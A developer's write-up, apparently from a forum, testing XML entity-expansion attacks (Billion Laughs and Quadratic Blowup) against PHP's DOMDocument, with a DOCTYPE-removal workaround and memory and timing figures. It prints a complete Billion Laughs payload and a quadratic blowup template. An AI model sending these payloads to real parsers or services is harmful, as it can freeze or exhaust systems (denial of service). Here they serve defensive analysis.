Note: If you create test cases from files that contain the XML chunks below, expect that editors may be vulnerable to these attacks as well and may freeze or crash.
Billion Laughs
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
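To put the payload above in perspective, the fully expanded size can be worked out by hand: lol is 3 bytes, and each of the nine levels repeats the previous one ten times, which comes to 3 × 10^9 bytes (roughly 3 GB) if every reference were substituted. A minimal sketch of that arithmetic follows; the variable names are only illustrative, and a 64-bit PHP build is assumed so the result stays an integer.

```php
<?php
// Size of &lol9; if every entity reference were substituted.
$size = strlen('lol');      // the base entity "lol" is 3 bytes
for ($level = 1; $level <= 9; $level++) {
    $size *= 10;            // each level references the previous one ten times
}
echo number_format($size), " bytes\n";
```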
When loading:
FATAL: #89: Detected an entity reference loop 1:7
... (the same error six more times, seven in total including the one above)
FATAL: #89: Detected an entity reference loop 14:13
Result:
<?xml version="1.0"?>
Memory usage is light; the peak is not touched by DOMDocument. As this example shows 7 fatal errors, one can conclude (and indeed it is so) that the following loads without errors:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
Since entity substitution is not in effect and this works, let's try the next one:
Quadratic Blowup
That is this one, shortened for your viewing pleasure (my variants are about 27 KB and 11 KB):
<?xml version="1.0"?>
<!DOCTYPE kaboom [
<!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>
If you use $doc->loadXML($src, LIBXML_NOENT); this does work as an attack: while I write this, the script is still loading. So this actually takes some time to load and consumes memory, which is something you can play with on your own. Without LIBXML_NOENT it loads flawlessly and fast.
But there is a caveat: if you read the nodeValue of an element, for example, you will get the entities expanded even if you don't use that loading flag.
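The two behaviours described above can be reproduced at a harmless scale. The following is only a sketch: buildQuadraticPayload() is a hypothetical helper, not part of any library, and the sizes (a 50-character entity referenced 40 times) are chosen small on purpose so that nothing freezes.

```php
<?php
// Hypothetical helper: builds a small, harmless quadratic-blowup document.
function buildQuadraticPayload(int $entityLength, int $referenceCount): string
{
    return '<?xml version="1.0"?>' . "\n"
        . '<!DOCTYPE kaboom [<!ENTITY a "' . str_repeat('a', $entityLength) . '">]>' . "\n"
        . '<kaboom>' . str_repeat('&a;', $referenceCount) . '</kaboom>';
}

$src = buildQuadraticPayload(50, 40); // would expand to 50 * 40 = 2000 characters

// Default load: the references stay in the tree as unexpanded nodes.
$plain = new DOMDocument();
$plain->loadXML($src);

// LIBXML_NOENT: the parser substitutes every reference while loading.
$expanded = new DOMDocument();
$expanded->loadXML($src, LIBXML_NOENT);

$plainXml     = $plain->saveXML();
$expandedXml  = $expanded->saveXML();
$plainText    = $plain->documentElement->nodeValue;    // expands on read
$expandedText = $expanded->documentElement->nodeValue;

printf("saveXML():  %d vs %d bytes\n", strlen($plainXml), strlen($expandedXml));
printf("nodeValue:  %d vs %d characters\n", strlen($plainText), strlen($expandedText));
```

Without the flag, the serialized XML stays small because it still contains &a;, while nodeValue returns the expanded text in both cases. With a real attack file the cost only moves from load time to read time.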
A workaround for this issue is to remove the DocumentType node from the document. Note the following code:
$doc = new DOMDocument();
$doc->loadXML($s); // where $s is the quadratic attack XML string above

// now remove the doctype node
foreach ($doc->childNodes as $child) {
    if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
        $doc->removeChild($child);
        break;
    }
}

// Now the following is true:
assert($doc->doctype === null);
assert($doc->lastChild->nodeValue === '...');

// Note that entities remain unexpanded in the output XML.
// This is not so good since this makes the XML invalid.
// Better is a manual walk through all nodes looking for XML_ENTITY_REF_NODE.
assert($doc->saveXML() === "<?xml version=\"1.0\"?>\n<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>\n");

// However, canonicalization will produce warnings because it must resolve entities:
assert($doc->C14N() === false);
// The warning will be like:
// PHP Warning: DOMNode::C14N(): Node XML_ENTITY_REF_NODE is invalid here
So while this workaround will prevent an XML document from consuming resources in a DoS, it makes it easy to generate invalid XML.
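The manual walk suggested in the code comment above could look roughly like this. It is a sketch under assumptions: countEntityReferences() is a hypothetical helper, it relies on unexpanded references appearing in the tree as nodes of type XML_ENTITY_REF_NODE (the type named in the C14N warning), and it only inspects element content, not attribute values.

```php
<?php
// Hypothetical helper: counts unexpanded entity references below $node.
function countEntityReferences(DOMNode $node): int
{
    $count = 0;
    foreach ($node->childNodes as $child) {
        if ($child->nodeType === XML_ENTITY_REF_NODE) {
            $count++;   // count it, but do not descend into the entity itself
        } elseif ($child->nodeType === XML_ELEMENT_NODE) {
            $count += countEntityReferences($child);
        }
    }
    return $count;
}

$doc = new DOMDocument();
$doc->loadXML('<!DOCTYPE r [<!ENTITY a "AAAA">]><r>x&a;y&a;<c>&a;</c></r>');

$references = countEntityReferences($doc);
if ($references > 0) {
    echo "Document contains $references entity reference(s); rejecting it.\n";
}
```

Counting rather than removing keeps the walk read-only: the caller can decide to reject the document before ever touching nodeValue, instead of producing XML with dangling references.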
Some figures (I reduced the file size, otherwise it takes too long):
LIBXML_NOENT disabled                                     | LIBXML_NOENT enabled
Mem: 356 184 (Peak: 435 464)                              | Mem: 356 280 (Peak: 435 464)
Loaded file quadratic-blowup-2.xml into string.           | Loaded file quadratic-blowup-2.xml into string.
Mem: 368 400 (Peak: 435 464)                              | Mem: 368 496 (Peak: 435 464)
DOMDocument loaded XML 11 881 bytes in 0.001368 secs.     | DOMDocument loaded XML 11 881 bytes in 15.993627 secs.
Mem: 369 088 (Peak: 435 464)                              | Mem: 369 184 (Peak: 435 464)
Removed load string.                                      | Removed load string.
Mem: 357 112 (Peak: 435 464)                              | Mem: 357 208 (Peak: 435 464)
Got XML (saveXML()), length: 11 880                       | Got XML (saveXML()), length: 11 165 132
Got Text (nodeValue), length: 11 160 314; 11.060893 secs. | Got Text (nodeValue), length: 11 160 314; 0.025360 secs.
Mem: 11 517 776 (Peak: 11 532 016)                        | Mem: 11 517 872 (Peak: 22 685 360)
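Figures in this shape can be collected with memory_get_usage(), memory_get_peak_usage() and microtime(). The sketch below is not the script that produced the numbers above: memLine() is a hypothetical helper, and the payload is a tiny stand-in. Note also that these functions report PHP's own allocator, so memory held inside libxml2 may not show up.

```php
<?php
// Hypothetical helper mirroring the "Mem: ... (Peak: ...)" lines above.
function memLine(): string
{
    return sprintf(
        'Mem: %s (Peak: %s)',
        number_format(memory_get_usage(), 0, '.', ' '),
        number_format(memory_get_peak_usage(), 0, '.', ' ')
    );
}

// Tiny stand-in payload: a 10-character entity referenced 10 times.
$src = '<?xml version="1.0"?><!DOCTYPE kaboom [<!ENTITY a "aaaaaaaaaa">]>'
     . '<kaboom>' . str_repeat('&a;', 10) . '</kaboom>';

echo memLine(), "\n";

$start = microtime(true);
$doc = new DOMDocument();
$doc->loadXML($src); // pass LIBXML_NOENT as second argument for the other column
printf("DOMDocument loaded XML %s bytes in %f secs.\n",
    number_format(strlen($src), 0, '.', ' '), microtime(true) - $start);
echo memLine(), "\n";

$start = microtime(true);
$text = $doc->documentElement->nodeValue;
printf("Got Text (nodeValue), length: %s; %f secs.\n",
    number_format(strlen($text), 0, '.', ' '), microtime(true) - $start);
echo memLine(), "\n";
```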
I have not made up my mind about protection strategies so far, but I now know that loading the billion laughs file into PHPStorm will freeze it, for example. I stopped testing the latter, as I didn't want to freeze it while writing this.